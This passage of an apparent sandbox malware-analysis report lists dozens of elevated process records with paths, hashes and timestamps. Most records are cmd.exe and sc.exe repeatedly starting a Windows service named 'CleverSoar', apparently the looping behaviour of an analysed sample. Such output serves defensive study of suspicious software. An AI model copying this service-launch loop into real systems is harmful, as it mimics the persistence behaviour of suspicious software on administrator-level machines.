                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:37
                            Start time:22:53:03
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff615b60000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:38
                            Start time:22:53:03
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff66e660000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:39
                            Start time:22:53:03
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff7b71e0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:40
                            Start time:22:53:03
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff615b60000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:41
                            Start time:22:53:03
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff66e660000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:42
                            Start time:22:53:03
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff7b71e0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:43
                            Start time:22:53:03
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff615b60000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:44
                            Start time:22:53:03
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff66e660000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:45
                            Start time:22:53:03
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff7b71e0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:46
                            Start time:22:53:03
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff615b60000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:47
                            Start time:22:53:03
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff66e660000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:48
                            Start time:22:53:03
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff7b71e0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:49
                            Start time:22:53:03
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff615b60000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:50
                            Start time:22:53:03
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff66e660000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:51
                            Start time:22:53:03
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff7b71e0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:52
                            Start time:22:53:03
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff615b60000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:53
                            Start time:22:53:03
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff66e660000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:54
                            Start time:22:53:03
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff7b71e0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:55
                            Start time:22:53:03
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff615b60000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:56
                            Start time:22:53:03
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff66e660000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:57
                            Start time:22:53:04
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff7b71e0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:58
                            Start time:22:53:04
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff615b60000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:59
                            Start time:22:53:04
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff66e660000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:60
                            Start time:22:53:04
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff7403e0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:61
                            Start time:22:53:04
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff615b60000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:62
                            Start time:22:53:04
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff66e660000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:63
                            Start time:22:53:04
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff7b71e0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:64
                            Start time:22:53:04
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff615b60000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:65
                            Start time:22:53:04
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff66e660000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:66
                            Start time:22:53:04
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff7b71e0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:67
                            Start time:22:53:04
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff615b60000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:68
                            Start time:22:53:04
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff66e660000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:69
                            Start time:22:53:04
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff7b71e0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:70
                            Start time:22:53:04
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff615b60000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:71
                            Start time:22:53:04
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff66e660000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:72
                            Start time:22:53:04
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff7b71e0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:73
                            Start time:22:53:04
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff615b60000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:74
                            Start time:22:53:04
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff66e660000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:75
                            Start time:22:53:04
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff7b71e0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:76
                            Start time:22:53:04
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff615b60000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:77
                            Start time:22:53:05
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff66e660000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:78
                            Start time:22:53:05
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff7b71e0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:79
                            Start time:22:53:05
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff615b60000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:80
                            Start time:22:53:05
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff66e660000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:81
                            Start time:22:53:05
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff7b71e0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:82
                            Start time:22:53:05
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff615b60000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:83
                            Start time:22:53:05
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff66e660000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:84
                            Start time:22:53:05
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff7b71e0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:85
                            Start time:22:53:05
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff615b60000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:86
                            Start time:22:53:05
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff66e660000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:87
                            Start time:22:53:05
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff7b71e0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:88
                            Start time:22:53:05
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff615b60000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:89
                            Start time:22:53:05
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff66e660000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:90
                            Start time:22:53:05
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff7b71e0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:91
                            Start time:22:53:05
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff615b60000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:92
                            Start time:22:53:05
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff66e660000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:93
                            Start time:22:53:05
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff7b71e0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:94
                            Start time:22:53:05
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff615b60000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:95
                            Start time:22:53:05
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff66e660000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:96
                            Start time:22:53:06
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff7b71e0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:97
                            Start time:22:53:06
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff615b60000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:98
                            Start time:22:53:06
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff66e660000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:99
                            Start time:22:53:06
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff7b71e0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:100
                            Start time:22:53:06
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff615b60000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:101
                            Start time:22:53:06
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff66e660000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:102
                            Start time:22:53:06
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff7b71e0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:103
                            Start time:22:53:06
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff615b60000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:104
                            Start time:22:53:06
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff66e660000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:105
                            Start time:22:53:06
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff7b71e0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:106
                            Start time:22:53:06
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff615b60000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:107
                            Start time:22:53:06
                            Start date:23/12/2024
